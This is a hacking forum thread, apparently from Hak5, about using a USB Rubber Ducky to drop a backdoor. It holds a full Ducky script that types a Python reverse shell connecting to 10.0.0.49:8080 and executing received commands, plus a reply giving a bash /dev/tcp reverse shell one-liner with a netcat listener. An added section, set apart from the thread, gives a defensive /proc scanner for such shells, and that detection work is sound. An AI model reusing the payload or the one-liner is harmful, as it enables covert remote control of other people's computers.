Skylord Posted March 4, 2018

Hello Hak5 Community! I have a quick newbie question. I created a Duck script that is supposed to deliver a Python TCP Reverse Shell through the python interpreter, but it is too much for the interpreter to handle. How do I get a pre-created script onto a target machine using the rubber ducky? Very confused. Here is my script, it is too much I know :( :

```
DELAY 2000
CTRL ESC
DELAY 1000
STRING Python
DELAY 200
ENTER
DELAY 500
STRING import socket
ENTER
DELAY 200
STRING import subprocess
ENTER
DELAY 200
STRING def connect():
ENTER
DELAY 200
STRING s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ENTER
DELAY 200
STRING s.connect(("10.0.0.49", 8080))
ENTER
DELAY 200
STRING while True:
ENTER
DELAY 200
STRING command = s.recv(1024)
ENTER
DELAY 200
STRING if 'terminate' in command:
ENTER
DELAY 200
STRING s.close
ENTER
DELAY 200
STRING break
ENTER
DELAY 200
STRING else:
ENTER
DELAY 200
STRING CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
ENTER
DELAY 200
STRING s.send(CMD.stdout.read())
ENTER
DELAY 200
STRING s.send(cmd.stderr.read())
ENTER
DELAY 200
STRING def main():
ENTER
DELAY 200
STRING connect()
ENTER
DELAY 200
STRING main()
ENTER
```

sub0 Posted March 4, 2018

If you really want to use Python, have the Ducky grab the script from a server (or hastebin). However, there are much easier ways to accomplish a backdoor. You can just execute this command: `bash -i >& /dev/tcp/pentesterIPaddr/5000 0>&1` on UNIX systems and catch the shell with Netcat (`nc -l -p 5000`).
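
Added example, not part of the thread or written by either poster: a defender-side check for the shell sub0 describes. `bash -i >& /dev/tcp/... 0>&1` leaves a shell whose stdin, stdout and stderr all point at one TCP socket, and this Python sketch finds such processes through Linux `/proc`. The function names, the sample `/proc/net/tcp` row, inode 424242 and address 192.0.2.10 are constructed for illustration; it assumes a little-endian host and covers IPv4 only.

```python
import os
import re
import socket
import struct

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
SOCK_LINK = re.compile(r"^socket:\[(\d+)\]$")
# Constructed sample data (not captured from a real host): one ESTABLISHED row
# to 192.0.2.10:5000, and the fd links of a shell bound to that socket.
SAMPLE_TCP = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 0B00A8C0:9C40 0A0200C0:1388 01 00000000:00000000 00:00000000 00000000  1000        0 424242 1 0000000000000000 20 4 30 10 -1\n"
)
SAMPLE_FDS = {n: "socket:[424242]" for n in (0, 1, 2)}

def parse_proc_net_tcp(text):
    """Map socket inode -> (remote_ip, remote_port) from /proc/net/tcp content."""
    table = {}
    for line in text.splitlines()[1:]:            # first line is the column header
        f = line.split()
        if len(f) < 10:
            continue
        ip_hex, port_hex = f[2].split(":")        # rem_address column
        ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
        table[f[9]] = (ip, int(port_hex, 16))     # field 9 is the socket inode
    return table

def shell_on_socket(comm, fds, tcp_table):
    """Return (ip, port) if a shell's stdin, stdout and stderr are one TCP socket."""
    if comm not in SHELLS:
        return None
    m = [SOCK_LINK.match(fds.get(n, "")) for n in (0, 1, 2)]
    if not all(m) or len({x.group(1) for x in m}) != 1:
        return None                               # tty, pipe, or different sockets
    return tcp_table.get(m[0].group(1))           # None for non-TCP/IPv6 sockets

def scan_live(proc="/proc"):
    """Walk a live Linux /proc and yield (pid, comm, remote) for each hit."""
    with open(os.path.join(proc, "net/tcp")) as fh:
        tcp = parse_proc_net_tcp(fh.read())
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(f"{proc}/{pid}/comm") as fh:
                comm = fh.read().strip()
            fds = {n: os.readlink(f"{proc}/{pid}/fd/{n}") for n in (0, 1, 2)}
        except OSError:                           # process exited or not readable
            continue
        hit = shell_on_socket(comm, fds, tcp)
        if hit:
            yield int(pid), comm, hit
```

Run `scan_live()` as root so the file-descriptor links of other users' processes are readable; a normal interactive shell shows `/dev/pts/N` on all three descriptors and is not reported.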

Skylord Posted March 5, 2018

Thank you for the reply sub0! Would that bash command work in Windows 10 PowerShell? Thank you.

sub0 Posted March 5, 2018

No, that command is for UNIX platforms. If you are targeting Windows, you could use Metasploit.